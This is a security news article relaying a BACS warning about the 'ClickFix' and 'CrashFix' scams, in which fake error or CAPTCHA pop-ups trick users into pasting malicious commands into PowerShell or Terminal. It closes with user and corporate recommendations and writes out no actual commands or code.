Topics
Services
Home > ClickFix« - Who ...
EN
EN DE FR IT

«ClickFix» - If a supposed error correction or verification installs malware

The BACS is currently observing an increase in reports of the «ClickFix» infection method. Users are tricked into inserting and executing malicious code into their computer's command line by feigning technical problems. The scam cleverly circumvents technical security measures, as the victims effectively authorize the infection of their system themselves.

Editorial - March 4, 2026

 

With the so-called click-fix, the user unsuspectingly inflicts the damage themselves Photo: depositphotos/solarseven

Behind the term «ClickFix» lies a sophisticated social engineering tactic. The name «ClickFix» describes a quick solution to a technical problem («fix») that is offered with a simple click («click»). The attackers manipulate legitimate but poorly secured websites or place advertisements that lead to prepared pages. As soon as a person visits the page, a deceptively real-looking overlay window or pop-up window appears.

According to the information in this window, there is a technical problem - such as a failed browser update, a DNS error, a problem displaying the content or, most frequently, that an alleged CAPTCHA needs to be solved. To resolve the problem, the user is shown a button.

Examples of a «ClickFix» insert. Photo: BACS

From the browser to the command line

Users have no idea that opening the website has already copied a malicious «PowerShell» command (for Windows) or a «Terminal» command (for macOS) to the clipboard. The victim is then instructed to perform inconspicuous key combinations. However, these key combinations have a lot to offer. In this way, the console is opened and the code previously copied to the clipboard is pasted. By pressing the Enter key, the command is then immediately executed and malicious code is loaded.

Damage potential

As soon as the command is executed, the script attempts to connect to a server and download a malicious program. While the direct download of malware is often blocked by antivirus programs, the command for the download now comes directly from the user in the context of their own authorizations, so that many security mechanisms do not sound the alarm. In most cases, a so-called «Infostealer» is downloaded. This malware specializes in reading passwords from browsers, emptying crypto wallets or stealing session cookies from Internet browsers, which attackers can use to log into accounts (e.g. email or company systems) without a password. In company networks, this can also be the first step in a subsequent ransomware attack.

Advanced method: «CrashFix»

Additional procedures have been established since the beginning of the year. One of these methods is known as «CrashFix». This involves the distribution of manipulated browser extensions disguised as useful tools such as ad blockers. These extensions are programmed in such a way that they intentionally cause a browser crash with a time delay. After restarting the browser, a message appears prompting the user to «repair» the alleged error by entering certain commands. In reality, these commands also enable the installation of malware.

Recommendations

  • Be suspicious if websites claim that your browser needs to be updated or that an error can only be rectified by executing commands. Official browser updates are carried out via the browser's internal settings, never via a website.
  • Never copy code or commands from unknown sources directly into the «PowerShell», the «Terminal» or the command prompt.
  • Do not install any programs from unknown sources.
  • Inform employees about this specific scam. Knowing that a website would never ask you to manually enter commands into the system is the best protection.
  • In corporate environments, it should be checked whether the execution of «PowerShell» scripts can be restricted for normal users.
  • If you have been the victim of such an attack, please report the incident.

Source: BACS

(Visited 99 times, 1 visits today)

More articles on the topic

How cyber criminals attack OT infrastructures - and that's what they're after

World Backup Day: Why recovery is more important today than the backup itself

Fewer cyberattacks in February - risk remains high

SECURITY NEWS

Stay informed about current security topics - practical and reliable. Receive exclusive content directly to your inbox. Don't miss any updates.

Register now!
register
You can unsubscribe at any time!
close-link